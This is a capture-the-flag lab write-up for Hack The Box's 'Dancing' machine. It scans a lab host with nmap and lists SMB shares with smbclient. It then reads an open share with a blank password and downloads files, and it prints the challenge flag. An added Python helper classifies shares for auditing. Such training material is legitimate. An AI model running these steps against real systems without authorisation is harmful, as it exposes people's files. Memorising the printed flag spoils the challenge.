Hack The Box Starting Point, Tier 0, Very Easy, machine #3: Dancing. Let's go!
TASK 1
What does 3-letter acronym SMB stand for?
Server Message Block
The SMB protocol is an application-layer network protocol used to access resources on a server, such as file shares and shared printers.
TASK 2
What port does SMB use to operate at?
445
When I researched SMB, I found that SMB uses either IP port 139 or 445.
Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an old transport layer that lets Windows computers talk to each other on the same network.
Port 445: Later versions of SMB (after Windows 2000) began to use port 445 directly on top of the TCP stack. Using TCP allows SMB to work over the internet.
TASK 3
What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
└──╼ [★]$ nmap -sC -sV 10.129.1.12
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-17 17:42 BST
Nmap scan report for 10.129.1.12
Host is up (0.027s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TASK 4
What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ’list’ the available shares on Dancing?
-L
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
└──╼ [★]$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
  -M, --message=HOST            Send message
  -I, --ip-address=IP           Use this IP to connect to
  -E, --stderr                  Write messages to stderr instead of stdout
  -L, --list=HOST               Get a list of shares available on a host
  -T, --tar=<c|x>IXFvgbNan      Command line tar
  -D, --directory=DIR           Start from directory
  -c, --command=STRING          Execute semicolon separated commands
  -b, --send-buffer=BYTES       Changes the transmit/send buffer
  -t, --timeout=SECONDS         Changes the per-operation timeout
  -p, --port=PORT               Port to connect to
  -g, --grepable                Produce grepable output
  -q, --quiet                   Suppress help message
  -B, --browse                  Browse SMB servers using DNS
TASK 5
How many shares are there on Dancing?
4
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
└──╼ [★]$ smbclient -L 10.129.1.12
Password for [WORKGROUP\leewookb]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk

SMB1 disabled -- no workgroup available
TASK 6
What is the name of the share we are able to access in the end with a blank password?
WorkShares
Running the smbclient -L 10.129.1.12 command, we can see that four separate shares are displayed. The default administrative shares often include the $ symbol at the end of their name to indicate that they are hidden shares. As we can see, the ADMIN$, C$ and IPC$ shares all include the symbol at the end. On the other hand, the WorkShares share does not include this symbol, which is an indicator that it is a user-created, or custom, share.
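To make the "default administrative share versus custom share" distinction above mechanical, here is an added example (not part of the original write-up) that parses the smbclient -L listing shown earlier and classifies each share. The share-line regex, the set of default share names and the sample listing are my own assumptions, the listing being a constructed copy of the one above.

```python
import re

# Constructed sample: the share listing from the `smbclient -L 10.129.1.12` run above.
SAMPLE_LISTING = """\
Password for [WORKGROUP\\leewookb]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk

SMB1 disabled -- no workgroup available
"""

# Shares Windows creates on its own (assumed set): named admin shares plus drive shares like C$.
DEFAULT_ADMIN_SHARES = {"ADMIN$", "IPC$", "PRINT$"}
DRIVE_SHARE = re.compile(r"^[A-Z]\$$")

# One row of the table: name, type column, optional comment. Header/separator rows never match.
SHARE_LINE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer)\s*(.*)$")


def parse_shares(listing):
    """Return a dict per share row: {'name', 'type', 'comment'}."""
    shares = []
    for line in listing.splitlines():
        m = SHARE_LINE.match(line)
        if m:
            name, kind, comment = m.groups()
            shares.append({"name": name, "type": kind, "comment": comment.strip()})
    return shares


def classify(share):
    """'default-admin' for built-in shares, 'hidden-custom' for other $ shares, else 'custom'."""
    name = share["name"]
    if name in DEFAULT_ADMIN_SHARES or DRIVE_SHARE.match(name):
        return "default-admin"
    return "hidden-custom" if name.endswith("$") else "custom"


def custom_shares(listing):
    """Names of shares an administrator created by hand, i.e. the ones worth auditing first."""
    return [s["name"] for s in parse_shares(listing) if classify(s) != "default-admin"]


def smb1_disabled(listing):
    """True when the server reported that the legacy SMB1 dialect is off (a good sign)."""
    return "SMB1 disabled" in listing
```

From a hardening point of view the interesting output is custom_shares(): a non-$ share reachable with a blank password, like WorkShares here, is exactly what a share audit should surface.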
TASK 7
What is the command we can use within the SMB shell to download the files we find?
get
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
└──╼ [★]$ smbclient \\\\10.129.1.12\\WorkShares
Password for [WORKGROUP\leewookb]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021
In order to connect to the custom share, WorkShares, we need to specify the target's IP address and the target SMB share. The command is smbclient \\\\{target_IP}\\{target_share}.
- The double backslashes ('\\') are used to escape the backslashes in the path.
- The path {target_IP}\\WorkShares refers to the "WorkShares" share on the machine identified by '{target_IP}'.
We were able to connect to the custom share, and I used the ls command to list all of the contents of the directories within the share. The command showed us two directories, one is Amy.J and the other is James.P.
smb: \> cd Amy.J
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 10:08:24 2021
  ..                                  D        0  Mon Mar 29 10:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 11:00:37 2021

                5114111 blocks of size 4096. 1733826 blocks available

smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021

                5114111 blocks of size 4096. 1733810 blocks available

smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 09:38:03 2021
  ..                                  D        0  Thu Jun  3 09:38:03 2021
  flag.txt                            A       32  Mon Mar 29 10:26:57 2021

                5114111 blocks of size 4096. 1733785 blocks available

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \James.P\>
I used the cd command to visit the Amy.J folder and found the 'worknotes.txt' file, which we can download using the get command. We also moved inside the James.P directory and downloaded the flag.txt file.
smb: \James.P\> quit
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
└──╼ [★]$ ls
Desktop  flag.txt  IXFvgbNan  my_data  Templates  worknotes.txt
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
└──╼ [★]$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664
Since we got everything we needed from the share, we can exit the SMB session; the files we downloaded are saved in the directory we ran the smbclient command from.
SUBMIT FLAG
submit root flag
5f61c10dffbc77a704d76016a22f1664